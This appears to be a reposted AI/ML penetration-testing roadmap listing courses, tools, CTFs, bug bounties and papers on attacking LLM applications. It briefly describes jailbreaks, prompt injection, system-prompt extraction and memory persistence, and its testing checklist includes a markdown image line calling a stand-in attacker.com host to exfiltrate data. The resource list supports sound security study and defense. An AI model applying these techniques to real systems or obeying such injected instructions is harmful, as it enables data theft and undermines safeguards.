AI/ML Pentesting Roadmap

Nytro · February 27

🛡️ AI/ML Pentesting Roadmap

A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.

📋 Table of Contents

Prerequisites

Before diving into AI/ML pentesting, ensure you have the following foundation:

General Security Basics

PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.)
TryHackMe — Pre-Security Path
HackTheBox Academy
OWASP Top 10

Programming (Python is essential)

Python for Everybody — Coursera
Automate the Boring Stuff with Python — Free online book
CS50P — Python — Free Harvard course

APIs & HTTP

Understand REST APIs, HTTP methods, headers, and authentication flows
Postman Learning Center
Practice with tools: curl, Burp Suite, Postman

Phase 1 — Foundations

1.1 Machine Learning Fundamentals

Resource	Type	Cost
Machine Learning — Andrew Ng (Coursera)	Course	Audit Free
Introduction to ML — edX	Course	Audit Free
fast.ai Practical Deep Learning	Course	Free
Google Machine Learning Crash Course	Course	Free
Kaggle ML Courses	Course	Free
3Blue1Brown — Neural Networks	Video	Free

1.2 Large Language Models (LLMs)

Understanding how LLMs work is critical before attacking them.

Resource	Type	Cost
Andrej Karpathy — Intro to LLMs	Video	Free
Andrej Karpathy — Let's build GPT	Video	Free
Hugging Face NLP Course	Course	Free
LLM University by Cohere	Course	Free
Prompt Engineering Guide	Guide	Free

Phase 2 — AI/ML Security Concepts

2.1 Core Security Concepts

OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities
MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems
NIST AI Risk Management Framework — Federal AI risk guidance
IBM — AI Security Overview
AI Village — LLM Threat Modeling
Promptingguide — Adversarial Attacks
HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI

2.2 Attack Surface Overview

Key attack vectors in AI/ML systems:

Prompt Injection — Manipulating LLM behavior through crafted inputs
Jailbreaking — Bypassing safety filters and guardrails
Model Inversion — Extracting training data from a model
Membership Inference — Determining if data was in training set
Data Poisoning — Corrupting training data to influence behavior
Adversarial Examples — Perturbed inputs that fool classifiers
Model Extraction/Stealing — Cloning a model via API queries
Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face
Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools
Training Data Exfiltration — Extracting memorized private data
Denial of Service — Overloading models via crafted prompts

2.3 MLOps & Infrastructure Security

Phase 3 — Prompt Injection & LLM Attacks

3.1 Understanding Prompt Injection

3.2 Jailbreaking Techniques

DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo
Role-playing / Persona manipulation
Token smuggling — Encoding instructions to bypass filters
Prompt leaking — Extracting system prompts
Indirect prompt injection — Attacks via documents, web content, memory
WideOpenAI — Jailbreak Collection
PayloadsAllTheThings — Prompt Injection
PALLMs — Payloads for Attacking LLMs

3.3 Indirect Prompt Injection

A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.

Greshake — LLM Security / Not What You've Signed Up For
Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection
GitHub Copilot Chat: Prompt Injection to Data Exfiltration
Google AI Studio Data Exfiltration

3.4 Advanced Prompt Attack Techniques

Phase 4 — Hands-On Practice

4.1 Interactive Platforms & Games

Platform	Description	Link
Gandalf	LLM prompt testing game — extract the password	gandalf.lakera.ai
Prompt Airlines	Gamified prompt injection learning	promptairlines.com
Crucible	Interactive AI security challenges by Dreadnode	crucible.dreadnode.io
Immersive Labs AI	Structured AI security exercises	prompting.ai.immersivelabs.com
Secdim AI Games	Prompt injection games	play.secdim.com/game/ai
HackAPrompt	Community prompt injection competition	hackaprompt.com
PortSwigger LLM Labs	Hands-on web LLM attack labs	Web Security Academy

4.2 Vulnerable-by-Design Projects

Repository	Description
Damn Vulnerable LLM Agent — WithSecureLabs	Intentionally vulnerable LLM agent
ScottLogic Prompt Injection Playground	Local prompt injection lab
Greshake LLM Security Tools	Proof-of-concept attacks

4.3 CTF Writeups to Study

Phase 5 — Advanced Exploitation Techniques

5.1 Agent & Tool Integration Attacks

When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.

5.2 Data Exfiltration via LLMs

5.3 Account Takeover & Authentication Attacks

5.4 XSS & Web Vulnerabilities in AI Products

5.5 Model & Infrastructure Attacks

5.6 Persistent Attacks & Memory Exploitation

ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red

5.7 Adversarial Machine Learning

CleverHans Library — Adversarial example library
ART (Adversarial Robustness Toolbox) — IBM
Foolbox — Python toolbox for adversarial attacks

Phase 6 — Real-World Research & Bug Bounty

6.1 Notable Research & Disclosures

6.2 How to Find LLM Vulnerabilities

Key areas to test when assessing an LLM-powered application:

System prompt extraction — Can you leak the hidden system prompt?
Instruction override — Can you ignore system-level instructions?
Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)?
Data exfiltration via markdown — Does the UI render ![](https://attacker.com?q=...) ?
Persistent injection via memory — Can you inject instructions that persist in memory/RAG?
PII leakage — Does the model reveal training data or other users' data?
Cross-user data leakage — In multi-tenant apps, can you access other users' contexts?
Authentication bypass — Can you trick the LLM into performing privileged actions?

Standards, Frameworks & References

Resource	Description
OWASP LLM Top 10	Top 10 LLM vulnerability classes
MITRE ATLAS	AI adversarial threat matrix
NIST AI RMF	US Federal AI risk management framework
OWASP AI Exchange	Cross-industry AI security guidance
ISO/IEC 42001	International AI management standard
ENISA AI Threat Landscape	EU AI threat landscape report
Google Secure AI Framework (SAIF)	Google's AI security framework

Tools & Repositories

Offensive Tools

Tool	Purpose
Garak	LLM vulnerability scanner
PyRIT	Microsoft's Python Risk Identification Toolkit for LLMs
LLM Fuzzer	Fuzzing framework for LLMs
PALLMs	Payloads for attacking LLMs
PromptInject	Prompt injection attack framework
PurpleLlama / CyberSecEval	Meta's LLM security evaluation

Defensive / Scanning Tools

Tool	Purpose
Rebuff	Prompt injection detection
NeMo Guardrails	NVIDIA guardrail framework
Lakera Guard	Commercial prompt injection protection
AI Exploits — ProtectAI	Real-world ML exploit collection
ModelScan	Scan ML model files for malicious code

Reference Lists

Resource	Description
Awesome LLM Security — corca-ai	Curated LLM security list
Awesome LLM — Hannibal046	Everything LLM including security
Awesome AI Security — ottosulin	General AI security resources
LLM Hacker's Handbook	Comprehensive hacking handbook
PayloadsAllTheThings — Prompt Injection	Payload collection
WideOpenAI	Jailbreak and bypass collection
Chatgpt-DAN	DAN jailbreak collection

Books, PDFs & E-Books

Resource	Link
LLM Hacker's Handbook	GitHub
OWASP Top 10 for LLM (Snyk)	PDF
Bugcrowd Ultimate Guide to AI Security	PDF
Lakera Real World LLM Exploits	PDF
HackerOne Ultimate Guide to Managing AI Risks	E-Book
Adversarial Machine Learning — Goodfellow et al.	arXiv

Video Resources

Resource	Link
Penetration Testing Against and With AI/LLM/ML (Playlist)	YouTube
Andrej Karpathy — Intro to Large Language Models	YouTube
DEF CON AI Village Talks	YouTube
LiveOverflow — AI/ML Security	YouTube
3Blue1Brown — Neural Networks Series	YouTube
John Hammond — AI Security Challenges	YouTube
Cybrary — Machine Learning Security	Cybrary

CTF & Competitions

Competition	Description	Link
Crucible	Ongoing AI security challenges	crucible.dreadnode.io
HackAPrompt	Annual prompt injection competition	hackaprompt.com
AI Village CTF (DEF CON)	Annual AI security CTF at DEF CON	aivillage.org
Gandalf	Self-paced LLM challenge	gandalf.lakera.ai
Prompt Airlines	Gamified injection challenges	promptairlines.com
Hack The Box AI Challenges	HTB AI-themed challenges	hackthebox.com
Secdim AI Games	Web-based AI security games	play.secdim.com/game/ai

Bug Bounty Programs

AI/ML security bug bounties are growing rapidly. Target these platforms:

Program	Scope	Link
OpenAI Bug Bounty	ChatGPT, API, plugins	bugcrowd.com/openai
Google AI Bug Bounty	Gemini, Bard, Vertex AI	bughunters.google.com
Meta AI Bug Bounty	Llama models, Meta AI	facebook.com/whitehat
HuggingFace via ProtectAI	Hub, models, spaces	huntr.com
Anthropic Bug Bounty	Claude, API	anthropic.com/security
Microsoft (Copilot, Azure AI)	Copilot, Azure OpenAI	msrc.microsoft.com
Huntr (AI/ML focused)	Open source ML libraries	huntr.com

Tips for AI bug bounty:

Focus on data exfiltration via markdown rendering (common finding)
Test plugin/tool integrations thoroughly
Look for prompt injection in RAG pipelines
Explore memory and persistent context manipulation
Check for cross-tenant data leakage in multi-user deployments

Community & News

Communities

AI Village — DEF CON's AI security community
OWASP AI Exchange — Open standard for AI security
ProtectAI — AI security research and tools
Embrace the Red — Blog — Leading blog on LLM security
Kai Greshake's Research — Indirect prompt injection research

Newsletters & Blogs

The Batch — DeepLearning.AI — Weekly AI news
Simon Willison's Weblog — Authoritative LLM security commentary
HiddenLayer Research — AI security research
Lakera Blog — LLM security insights
PortSwigger Research — Web + AI security research

Suggested Learning Path by Experience Level

🟢 Beginner (0–3 months)

Complete PortSwigger Web Security Academy fundamentals
Learn Python basics
Take Google ML Crash Course
Read OWASP LLM Top 10
Play Gandalf — all levels
Read Simon Willison's prompt injection article
Watch Andrej Karpathy — Intro to LLMs

🟡 Intermediate (3–9 months)

Study MITRE ATLAS Matrix
Complete PortSwigger LLM Attack labs
Set up and exploit Damn Vulnerable LLM Agent
Complete Prompt Airlines and Crucible challenges
Read the LLM Hacker's Handbook
Study the Embrace the Red blog in full
Experiment with Garak and PyRIT
Try Offensive ML Playbook

🔴 Advanced (9+ months)

Participate in AI Village CTF at DEF CON
Submit findings to Huntr or OpenAI Bug Bounty
Study adversarial ML with ART and CleverHans
Read academic papers on model inversion, membership inference, and data extraction
Contribute to open source tools like Garak or AI Exploits
Build your own vulnerable LLM demo environment
Write and publish research — blog posts, CVEs, conference talks

Key Academic Papers

Paper	Year
Explaining and Harnessing Adversarial Examples — Goodfellow et al.	2014
Extracting Training Data from Large Language Models — Carlini et al.	2021
Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al.	2023
Membership Inference Attacks against Machine Learning Models — Shokri et al.	2017
Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al.	2023
Jailbroken: How Does LLM Safety Training Fail? — Wei et al.	2023
Prompt Injection attack against LLM-integrated Applications	2023

Last updated: 2025 | Contributions welcome — submit a PR with new resources.

Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection

Sign In